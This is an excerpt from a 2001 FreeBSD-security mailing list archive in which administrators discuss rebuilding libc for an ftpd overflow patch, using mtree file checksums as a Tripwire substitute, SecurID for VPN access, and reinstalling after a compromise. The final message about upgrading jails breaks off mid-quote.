Message-ID: <20010419213925.S83948-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

Make sure that you remove everything below /usr/sup/src-all/. There
should be a file there called checkouts.cvs that could hose up a fresh
checkout.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Thu, 19 Apr 2001, Brian Tiemann wrote:

> Yes, I cvsupped immediately before rebuilding. That's the entire
> problem.
>
> The current best attempt has been to remove /usr/src and /usr/obj,
> cvsup to checkout a fresh 4-STABLE tree as of this afternoon, and try to
> build libc. But that's not working. So while what's causing libc to not
> compile is probably not related to the patch, what it means is that
> we're all effectively left without a solution to the ftpd overflow
> problem until the build error in mpool.c is dealt with.
>
> I cvsup 4-STABLE every night. I sort of thought that was what "tracking
> -STABLE" meant. It's so I don't have to worry about downloading patches.
>
> Brian
>
>
> Kris Kennaway wrote:
> >
> > On Thu, Apr 19, 2001 at 06:10:11PM -0700, Brian Tiemann wrote:
> > > Well, that's great, but something needs to be looked at for those of us
> > > tracking 4-STABLE. Thanks...
> >
> > If you're tracking -stable, why not just cvsup? We can't possibly
> > test the patches with every possible different point on the RELENG_4
> > continuum, so we kind of assume that if you've cvsupped once to get to
> > a non-release version of -stable you can do it again. Having said
> > that, I can't think of any differences in libc which would have caused
> > this to fail between 4.2-REL and some later version of 4.2-STABLE.
> >
> > Kris
> >
> > ------------------------------------------------------------------------
> > Part 1.2Type: application/pgp-signature
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE635PGv8Bofna59hYRAy1gAJ0bPosUHIAVItNcyQ1wmk7rZvXHnACeK1a1
z6/tCKdyZo19UrSbvaCaxck=
=z8cs
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Apr 19 19:47:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 37F6437B423 for ; Thu, 19 Apr 2001 19:47:15 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C6A6766B38; Thu, 19 Apr 2001 19:47:10 -0700 (PDT)
Date: Thu, 19 Apr 2001 19:47:10 -0700
From: Kris Kennaway
To: Brian Tiemann
Cc: Kris Kennaway , Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG
Subject: Re: Another glob problem
Message-ID: <20010419194710.A58378@xor.obsecurity.org>
References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> <20010419181459.B57373@xor.obsecurity.org> <3ADF8EFB.1B6EBA04@packeteer.com> <20010419183125.A57696@xor.obsecurity.org> <3ADF92DC.2B5A941D@packeteer.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="opJtzjQTFsWo+cga"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3ADF92DC.2B5A941D@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 06:37:32PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--opJtzjQTFsWo+cga
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Thu, Apr 19, 2001 at 06:37:32PM -0700, Brian Tiemann wrote:
> I'm just trying to compile /usr/src/lib/libc. I suppose that's not
> going to work-- a make world will be indicated. Which really sucks for a
> production server.
>
> Yikes. And we were so close to making it to 4.3-RELEASE without an
> interim build...

That's the trade-off you make when you cvsup -stable. If you have lots
of machines to update, or (sensibly) want to test it before deploying
on your production systems, just build world + test on a scratch
machine, then installworld via NFS on the target servers.

Kris

--opJtzjQTFsWo+cga
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE636MuWry0BWjoQKURAhWBAKCcR9eiXlwMwr9zGdOU6a2hgPeNCgCbBItd
dgWDa0tuWKi5HczZwU6alsE=
=ID9c
-----END PGP SIGNATURE-----

--opJtzjQTFsWo+cga--

From owner-freebsd-security Thu Apr 19 19:59:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 2AFBC37B42C for ; Thu, 19 Apr 2001 19:59:15 -0700 (PDT) (envelope-from geniusj@bluenugget.net)
Received: from skinflutei32jg (windows.box [64.3.150.191]) by bluenugget.net (Postfix) with ESMTP id 731A31377E; Thu, 19 Apr 2001 20:01:53 -0700 (PDT)
Message-ID: <00d301c0c946$b05c8140$bf960340@skinflutei32jg>
From: "Jason DiCioccio"
To: "Emre Bastuz" ,
References: <3ADF3CCC.FB8498DC@emre.de>
Subject: Re: Tripwire or the like for FreeBSD ?
Date: Thu, 19 Apr 2001 20:05:00 -0700
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Couldn't you easily hack something up using mtree?

----- Original Message -----
From: "Emre Bastuz"
To:
Sent: Thursday, April 19, 2001 12:30 PM
Subject: Tripwire or the like for FreeBSD ?

> Hi,
>
> I was just wondering if there is Tripwire for FreeBSD or some decent tool
> that has similar/better functionality ?
>
> The Tripwire homepage seems to be pretty commercial and lacks a BSD
> version (they seem to be focused on Linux).
>
> I found something called "Aide" in the ports directory, but to be honest -
> I don't trust a "Version 0.7" when it comes to security.
>
> Does anyone know any alternative ?
>
> Regards,
>
> Emre
>
> --
> Emre Bastuz
> info@emre.de http://www.emre.de
> UIN: 561260 PGP Key ID: 0xAFAC77FD
>

From owner-freebsd-security Thu Apr 19 20:07:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 8E59737B423 for ; Thu, 19 Apr 2001 20:07:26 -0700 (PDT) (envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3K37LL85663; Thu, 19 Apr 2001 23:07:21 -0400 (EDT) (envelope-from rsimmons@wlcg.com)
Date: Thu, 19 Apr 2001 23:07:16 -0400 (EDT)
From: Rob Simmons
To: Jason DiCioccio
Cc: Emre Bastuz ,
Subject: Re: Tripwire or the like for FreeBSD ?
In-Reply-To: <00d301c0c946$b05c8140$bf960340@skinflutei32jg>
Message-ID: <20010419230519.F85568-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

Please do :)

http://www.freebsd.org/doc/en_US.ISO_8859-1/books/handbook/contrib.html#CONTRIB-WHAT

See #6 in High priority tasks.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Thu, 19 Apr 2001, Jason DiCioccio wrote:

> Couldn't you easily hack something up using mtree?
> ----- Original Message -----
> From: "Emre Bastuz"
> To:
> Sent: Thursday, April 19, 2001 12:30 PM
> Subject: Tripwire or the like for FreeBSD ?
>
>
> > Hi,
> >
> > I was just wondering if there is Tripwire for FreeBSD or some decent tool
> > that has similar/better functionality ?
> >
> > The Tripwire homepage seems to be pretty commercial and lacks a BSD
> > version (they seem to be focused on Linux).
> >
> > I found something called "Aide" in the ports directory, but to be honest -
> > I don't trust a "Version 0.7" when it comes to security.
> >
> > Does anyone know any alternative ?
> >
> > Regards,
> >
> > Emre
> >
> > --
> > Emre Bastuz
> > info@emre.de http://www.emre.de
> > UIN: 561260 PGP Key ID: 0xAFAC77FD
> >
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE636fov8Bofna59hYRA3fnAKDBzE+dCxBb6ZZc0rRyLSF7E0ISCQCghL23
wQIM9wTnvZQPigab/oZYpZI=
=lQWF
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Apr 19 20:18:05 2001
Delivered-To: freebsd-security@freebsd.org
Received: from backup.af.speednet.com.au (af.speednet.com.au [202.135.188.244]) by hub.freebsd.org (Postfix) with ESMTP id 4A30237B422 for ; Thu, 19 Apr 2001 20:17:52 -0700 (PDT) (envelope-from andyf@speednet.com.au)
Received: from backup.af.speednet.com.au (backup.af.speednet.com.au [172.22.2.4]) by backup.af.speednet.com.au (8.11.3/8.11.3) with ESMTP id f3K3Gtc14728; Fri, 20 Apr 2001 13:16:55 +1000 (EST) (envelope-from andyf@speednet.com.au)
Date: Fri, 20 Apr 2001 13:16:54 +1000 (EST)
From: Andy Farkas
X-X-Sender:
To: Rob Simmons
Cc: Jason DiCioccio , Emre Bastuz ,
Subject: Re: Tripwire or the like for FreeBSD ?
In-Reply-To: <20010419230519.F85568-100000@mail.wlcg.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Search the -security mailing list for "alternative tripwire options" and
you'll find a message by Garrett Wollman that says:

> In any event, try (in 5-current and 4-stable):
>
>     # mtree -ciK md5digest,sha1digest,ripemd160digest -p / \
>     > >my.file.list
>
> To check, use:
>
>     # mtree -p / my.file.list
>
> You will probably find a significant number of files which are
> expected to change; you'll want to list these in a separate file and
> regenerate the list using the `-X' option. (You'll then also want to
> check the list using the same option.) At some point, I'll try to
> come up with a list which could serve as a starting point.


On Thu, 19 Apr 2001, Rob Simmons wrote:

> Please do :)
>
> http://www.freebsd.org/doc/en_US.ISO_8859-1/books/handbook/contrib.html#CONTRIB-WHAT
>
> See #6 in High priority tasks.
>
> Robert Simmons
> Systems Administrator
> http://www.wlcg.com/
>
> On Thu, 19 Apr 2001, Jason DiCioccio wrote:
>
> > Couldn't you easily hack something up using mtree?
> > ----- Original Message -----
> > From: "Emre Bastuz"
> > To:
> > Sent: Thursday, April 19, 2001 12:30 PM
> > Subject: Tripwire or the like for FreeBSD ?
> >
> >
> > > Hi,
> > >
> > > I was just wondering if there is Tripwire for FreeBSD or some decent tool
> > > that has similar/better functionality ?
> > >
> > > The Tripwire homepage seems to be pretty commercial and lacks a BSD
> > > version (they seem to be focused on Linux).
> > >
> > > I found something called "Aide" in the ports directory, but to be honest -
> > > I don't trust a "Version 0.7" when it comes to security.
> > >
> > > Does anyone know any alternative ?
> > >
> > > Regards,
> > >
> > > Emre
> > >
> > > --
> > > Emre Bastuz
> > > info@emre.de http://www.emre.de
> > > UIN: 561260 PGP Key ID: 0xAFAC77FD
> > >
> >
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.4 (FreeBSD)
> Comment: For info see http://www.gnupg.org
>
> iD8DBQE636fov8Bofna59hYRA3fnAKDBzE+dCxBb6ZZc0rRyLSF7E0ISCQCghL23
> wQIM9wTnvZQPigab/oZYpZI=
> =lQWF
> -----END PGP SIGNATURE-----
>

--

:{ andyf@speednet.com.au

Andy Farkas
System Administrator
Speednet Communications
http://www.speednet.com.au/

From owner-freebsd-security Thu Apr 19 20:29:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id E17B537B422 for ; Thu, 19 Apr 2001 20:29:47 -0700 (PDT) (envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3K3TVN86078; Thu, 19 Apr 2001 23:29:32 -0400 (EDT) (envelope-from rsimmons@wlcg.com)
Date: Thu, 19 Apr 2001 23:29:27 -0400 (EDT)
From: Rob Simmons
To: Andy Farkas
Cc: Jason DiCioccio , Emre Bastuz ,
Subject: Re: Tripwire or the like for FreeBSD ?
In-Reply-To:
Message-ID: <20010419232353.R85568-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

Is there a reason to use md5, sha1, and ripemd160 together? I would think
ripemd160digest alone would be sufficient. Also, burning the output of
that to a CD is a pretty good way to prevent tampering.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Fri, 20 Apr 2001, Andy Farkas wrote:

>
> Search the -security mailing list for "alternative tripwire options" and
> you'll find a message by Garrett Wollman that says:
>
> > In any event, try (in 5-current and 4-stable):
> >
> >     # mtree -ciK md5digest,sha1digest,ripemd160digest -p / \
> >     > >my.file.list
> >
> > To check, use:
> >
> >     # mtree -p / my.file.list
> >
> > You will probably find a significant number of files which are
> > expected to change; you'll want to list these in a separate file and
> > regenerate the list using the `-X' option. (You'll then also want to
> > check the list using the same option.) At some point, I'll try to
> > come up with a list which could serve as a starting point.
>
>
> On Thu, 19 Apr 2001, Rob Simmons wrote:
>
> > Please do :)
> >
> > http://www.freebsd.org/doc/en_US.ISO_8859-1/books/handbook/contrib.html#CONTRIB-WHAT
> >
> > See #6 in High priority tasks.
> >
> > Robert Simmons
> > Systems Administrator
> > http://www.wlcg.com/
> >
> > On Thu, 19 Apr 2001, Jason DiCioccio wrote:
> >
> > > Couldn't you easily hack something up using mtree?
> > > ----- Original Message -----
> > > From: "Emre Bastuz"
> > > To:
> > > Sent: Thursday, April 19, 2001 12:30 PM
> > > Subject: Tripwire or the like for FreeBSD ?
> > >
> > >
> > > > Hi,
> > > >
> > > > I was just wondering if there is Tripwire for FreeBSD or some decent tool
> > > > that has similar/better functionality ?
> > > >
> > > > The Tripwire homepage seems to be pretty commercial and lacks a BSD
> > > > version (they seem to be focused on Linux).
> > > >
> > > > I found something called "Aide" in the ports directory, but to be honest -
> > > > I don't trust a "Version 0.7" when it comes to security.
> > > >
> > > > Does anyone know any alternative ?
> > > >
> > > > Regards,
> > > >
> > > > Emre
> > > >
> > > > --
> > > > Emre Bastuz
> > > > info@emre.de http://www.emre.de
> > > > UIN: 561260 PGP Key ID: 0xAFAC77FD
> > > >
> > >
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.0.4 (FreeBSD)
> > Comment: For info see http://www.gnupg.org
> >
> > iD8DBQE636fov8Bofna59hYRA3fnAKDBzE+dCxBb6ZZc0rRyLSF7E0ISCQCghL23
> > wQIM9wTnvZQPigab/oZYpZI=
> > =lQWF
> > -----END PGP SIGNATURE-----
> >
>
> --
>
> :{ andyf@speednet.com.au
>
> Andy Farkas
> System Administrator
> Speednet Communications
> http://www.speednet.com.au/
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6360bv8Bofna59hYRAxraAJ4rfOczD5fDvOi4nqUFvA/TpP49RgCeLhQM
tvlbZM+AMyY0bdyRwhiALIY=
=UbCU
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Apr 19 20:33:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 0329337B423 for ; Thu, 19 Apr 2001 20:33:54 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id XAA44812; Thu, 19 Apr 2001 23:33:39 -0400 (EDT) (envelope-from wollman)
Date: Thu, 19 Apr 2001 23:33:39 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200104200333.XAA44812@khavrinen.lcs.mit.edu>
To: Rob Simmons
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Tripwire or the like for FreeBSD ?
In-Reply-To: <20010419232353.R85568-100000@mail.wlcg.com>
References: <20010419232353.R85568-100000@mail.wlcg.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Is there a reason to use md5, sha1, and ripemd160 together? I would think
> ripemd160digest alone would be sufficient.

Of course. If someone breaks one of the crypto hash algorithms, it is
likely that the discovery will not be immediately applicable to other
algorithms, so the other checksums will still be of some value.

(Hmmm. I wonder how susceptible these hash algorithms are to quantum
computation...?)

-GAWollman

From owner-freebsd-security Thu Apr 19 20:46:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 8DFCA37B424 for ; Thu, 19 Apr 2001 20:46:42 -0700 (PDT) (envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3K3kBe86404; Thu, 19 Apr 2001 23:46:11 -0400 (EDT) (envelope-from rsimmons@wlcg.com)
Date: Thu, 19 Apr 2001 23:46:07 -0400 (EDT)
From: Rob Simmons
To: Garrett Wollman
Cc:
Subject: Re: Tripwire or the like for FreeBSD ?
In-Reply-To: <200104200333.XAA44812@khavrinen.lcs.mit.edu>
Message-ID: <20010419234434.S86364-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

That is true. Maybe in the interest of lower overhead two algorithms
could be used. Drop md5?

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Thu, 19 Apr 2001, Garrett Wollman wrote:

>
> > Is there a reason to use md5, sha1, and ripemd160 together? I would think
> > ripemd160digest alone would be sufficient.
>
> Of course. If someone breaks one of the crypto hash algorithms, it is
> likely that the discovery will not be immediately applicable to other
> algorithms, so the other checksums will still be of some value.
>
> (Hmmm. I wonder how susceptible these hash algorithms are to quantum
> computation...?)
>
> -GAWollman
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE637EDv8Bofna59hYRAwqxAKCMIv618djie1lLNu2svERd5dseHACcDeFp
Gu/gh/I5OVPM4UemRhWpBoU=
=lxVG
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Apr 19 22:00:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cessium.prosolve.com (gw.prosolve.com [63.225.188.140]) by hub.freebsd.org (Postfix) with ESMTP id 3043E37B422 for ; Thu, 19 Apr 2001 22:00:41 -0700 (PDT) (envelope-from SeanM@prosolve.com)
Received: from fs01.prosolve.com (fs01.prosolve.com [172.16.128.50]) by cessium.prosolve.com (8.11.1/8.11.1) with ESMTP id f3K50Ti56479; Thu, 19 Apr 2001 22:00:29 -0700 (PDT)
Received: by fs01.prosolve.com with Internet Mail Service (5.5.2650.21) id <28Z1MGPN>; Thu, 19 Apr 2001 22:00:29 -0700
Message-ID:
From: Sean Mathias
To: "'Jason DiCioccio'" , Emre Bastuz , freebsd-security@FreeBSD.ORG
Subject: RE: Tripwire or the like for FreeBSD ?
Date: Thu, 19 Apr 2001 22:00:28 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hopefully I am not being too dense, but what about the Tripwire-1.2 in
the security ports?

SM

-----Original Message-----
From: Jason DiCioccio [mailto:geniusj@bluenugget.net]
Sent: Thursday, April 19, 2001 8:05 PM
To: Emre Bastuz; freebsd-security@FreeBSD.ORG
Subject: Re: Tripwire or the like for FreeBSD ?


Couldn't you easily hack something up using mtree?

----- Original Message -----
From: "Emre Bastuz"
To:
Sent: Thursday, April 19, 2001 12:30 PM
Subject: Tripwire or the like for FreeBSD ?

> Hi,
>
> I was just wondering if there is Tripwire for FreeBSD or some decent tool
> that has similar/better functionality ?
>
> The Tripwire homepage seems to be pretty commercial and lacks a BSD
> version (they seem to be focused on Linux).
>
> I found something called "Aide" in the ports directory, but to be honest -
> I don't trust a "Version 0.7" when it comes to security.
>
> Does anyone know any alternative ?
>
> Regards,
>
> Emre
>
> --
> Emre Bastuz
> info@emre.de http://www.emre.de
> UIN: 561260 PGP Key ID: 0xAFAC77FD
>

From owner-freebsd-security Fri Apr 20 00:32:38 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nameserver.austclear.com.au (nameserver.austclear.com.au [192.83.119.132]) by hub.freebsd.org (Postfix) with ESMTP id 8DE7837B43C; Fri, 20 Apr 2001 00:32:32 -0700 (PDT) (envelope-from ahl@austclear.com.au)
Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.70.1]) by nameserver.austclear.com.au (8.9.3/8.9.3) with ESMTP id RAA66115; Fri, 20 Apr 2001 17:32:31 +1000 (EST)
Received: from tungsten (tungsten [192.168.70.1]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id RAA15105; Fri, 20 Apr 2001 17:32:31 +1000 (EST)
Message-Id: <200104200732.RAA15105@tungsten.austclear.com.au>
X-Mailer: exmh version 2.1.1 10/15/1999
To: "Otter"
Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: remote SecureID authentication anyone?
In-Reply-To: Message from "Otter" of "Thu, 19 Apr 2001 21:12:41 -0400." <000201c0c936$ffec3120$1400a8c0@zoso>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 20 Apr 2001 17:32:31 +1000
From: Tony Landells
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

otterr@telocity.com said:
> I'm looking to set up a machine in our office so a few of us can get in
> on a VPN for network access after hours from home. I've heard VPNs are
> possible. After discussing this with office management, they say the
> only way we can do this is to use security in addition to passwords.
> When I asked if our SecureID cards/keychains would work, they agreed
> on it. Now... has anyone got this setup or something similar? I looked
> on the mailing list archives with no luck... searched some web
> pages... I even remember ssh2 using it, but now I don't see any
> reference to it in the openssh or ssh2 makefiles. Answers and/or
> suggestions are greatly appreciated.

To some extent this depends on what you're intending to use for your VPN.

The SecurID server can be configured to handle RADIUS authentication,
so any VPN software that can do RADIUS can do SecurID.

Tony
--
Tony Landells                                   Senior Network Engineer
Ph: +61 3 9677 9319            Australian Clearing Services Pty Ltd
Fax: +61 3 9677 9355           Level 4, Rialto North Tower
                               525 Collins Street
                               Melbourne VIC 3000
                               Australia

From owner-freebsd-security Fri Apr 20 00:47:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (adam042-060.resnet.wisc.edu [146.151.42.60]) by hub.freebsd.org (Postfix) with ESMTP id F085B37B424 for ; Fri, 20 Apr 2001 00:47:22 -0700 (PDT) (envelope-from silby@silby.com)
Received: (qmail 25499 invoked by uid 1000); 20 Apr 2001 07:47:21 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 20 Apr 2001 07:47:21 -0000
Date: Fri, 20 Apr 2001 02:47:21 -0500 (CDT)
From: Mike Silbersack
To: Brian Tiemann
Subject: Re: maxusers

On Thu, 19 Apr 2001, Brian Tiemann wrote:

> Would it be a horrible idea to change the name of the key in the
> config file? Maybe to something less likely to cause this (very common
> and understandable) error-- like, say, RSRCLIM (resource limit)?
>
> Brian

Changing MAXUSERS to something else would probably just aggravate a lot
of people and not help much.

A better solution (which has already been done for the mbuf system) is to
turn the setting MAXUSERS into tuneables that can be set in loader.conf.
And once that's complete, it leaves the door open for someone to add
auto-tuning based on ram size.

Mike "Silby" Silbersack

From owner-freebsd-security Fri Apr 20 1:34:36 2001
Date: Fri, 20 Apr 2001 10:34:21 +0200
To: freebsd-security@freebsd.org
From: Ragnar Beer
Subject: RE: Tripwire or the like for FreeBSD ?

Has anybody looked at http://sourceforge.net/projects/tripwire/ ? There's
a GPL'd version (2.3.1-2) of Tripwire. I got the impression that over mtree
Tripwire has the advantage of a more fine-grained control.

Ragnar

>Hopefully I am not being too dense, but what about the Tripwire-1.2 in the
>security ports?
>
>SM

From owner-freebsd-security Fri Apr 20 2:11:18 2001
Date: Fri, 20 Apr 2001 02:10:53 -0700 (PDT)
From: "Michael A. Dickerson"
To: freebsd-security@freebsd.org
Subject: Re: Tripwire or the like for FreeBSD ?

"Garrett Wollman" wrote
> (Hmmm. I wonder how susceptible these hash algorithms are to quantum
> computation...?)

Not very--at least, no publicly known research suggests that quantum
computers will be immediately useful against hash algorithms. The only
published quantum algorithm relevant to cryptography (that I know of) is
for factoring large numbers in polynomial time.

(Sorry, couldn't resist commenting as I just finished my thesis on quantum
computing and Fourier transforms!)

M.D.

From owner-freebsd-security Fri Apr 20 4:42:25 2001
From: Cy Schubert - ITSD Open Systems Group
To: Dag-Erling Smorgrav
Cc: Peter Pentchev, "David G. Andersen", Kris Kennaway, fukuda shinichi, freebsd-security@FreeBSD.ORG
Subject: Re: unknown process
Date: Fri, 20 Apr 2001 04:40:06 -0700

Dag-Erling Smorgrav writes:
> Peter Pentchev writes:
> > On Thu, Apr 19, 2001 at 11:31:26AM +0200, Dag-Erling Smorgrav wrote:
> > > It's not either/or. The only acceptable solution to this situation is
> > > a complete reinstall from a trusted source (e.g. original CD set).
> > ..and during the install, examine your backups
>
> A backup is not a trusted source. Never reinstall from backups after
> a compromise. Restoring user data from backup is acceptable as long
> as you are certain that none of that data is executable.

Even then you cannot trust user data because there is no way to know
whether it has been modified. For example if the user data is financial
you MUST hire an auditor to verify that the data is correct.

If you can ABSOLUTELY establish when the compromise occurred, restoring
user data and the rest of the system from that point would be acceptable.
However, in most cases you will not be able to ABSOLUTELY establish when
the compromise occurred, so you have to suspect ABSOLUTELY everything on
the machine.
Regards,

Cy Schubert
Team Leader, Sun/Alpha Team
Open Systems Group, ITSD, ISTA
Province of BC
Phone: (250)387-8437  Fax: (250)387-5766
Internet: Cy.Schubert@osg.gov.bc.ca

From owner-freebsd-security Fri Apr 20 4:43:54 2001
From: Cy Schubert - ITSD Open Systems Group
To: Raoul Schroeder
Cc: Kris Kennaway, fukuda shinichi, freebsd-security@FreeBSD.ORG
Subject: Re: unknown process
Date: Fri, 20 Apr 2001 04:42:41 -0700

In message <3ADEFE00.812EA0A3@gmx.net>, Raoul Schroeder writes:
> > Take your system off the net and check it for signs of intrusion.
> >
> > Kris
>
> Just a quick question: How does one check for signs of intrusion. The FreeBSD
> handbook does not really talk a lot about this.
> Is there a good documentation about this?

Install an IDS immediately after installation, then use it. This is not a
100% solution but IMO one of the better solutions in your toolkit.

Regards,

Cy Schubert
Team Leader, Sun/Alpha Team
Open Systems Group, ITSD, ISTA
Province of BC
Phone: (250)387-8437  Fax: (250)387-5766
Internet: Cy.Schubert@osg.gov.bc.ca

From owner-freebsd-security Fri Apr 20 6:58:19 2001
From: "Barkell, Bill"
To: 'Tony Landells', Otter
Cc: questions@FreeBSD.ORG, security@FreeBSD.ORG
Subject: RE: remote SecureID authentication anyone?
Date: Fri, 20 Apr 2001 09:57:58 -0400

Secure ID can be set up for VPN in the following manner: (there may be
other ways as well)

1) VPN gateway is connected to internet
2) SecureID ACE server is set up on internal network
3) VPN gateway is told to pass authentication to the ACE server

Client connects to the gateway, conversation takes place between the
gateway and the ACE server, gateway grants access to client.

This does work with several popular VPN gateway products.

William Barkell
Network Security Analyst
Corporate Information Systems
Compuware Corporation
31440 Northwestern Highway
Farmington Hills, MI 48334

-----Original Message-----
From: Tony Landells [mailto:ahl@austclear.com.au]
Sent: Friday, April 20, 2001 3:33 AM
To: Otter
Cc: questions@FreeBSD.ORG; security@FreeBSD.ORG
Subject: Re: remote SecureID authentication anyone?

otterr@telocity.com said:
> I'm looking to setup a machine in our office so a few of us can get in
> on a VPN for network access after hours from home. I've heard VPNs are
> possible. After discussing this with office management, they say the
> only way we can do this is to use security in addition to passwords.
> When I asked if our SecureID cards/keychains would work, they agreed
> on it. Now... has anyone got this setup or something similar? I looked
> on the mailing list archives with no luck... searched some web
> pages... I even remember ssh2 using it, but now I don't see any
> reference to it in the openssh or ssh2 makefiles. Answers and/or
> suggestions are greatly appreciated.

To some extent this depends what you're intending to use for your VPN.

The SecurID server can be configured to handle RADIUS authentication, so
any VPN software that can do RADIUS can do SecurID.
Tony
--
Tony Landells, Senior Network Engineer
Australian Clearing Services Pty Ltd
Ph: +61 3 9677 9319  Fax: +61 3 9677 9355
Level 4, Rialto North Tower, 525 Collins Street, Melbourne VIC 3000, Australia

From owner-freebsd-security Fri Apr 20 8: 1:53 2001
Date: Fri, 20 Apr 2001 23:04:34 +0700
From: Igor Podlesny
Organization: Morning Network
To: kj
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: jail upgrade

k> Hey, all.
k> I have two jails on my server.
k> When I do a make world on the actual OS, does it matter if I upgrade the
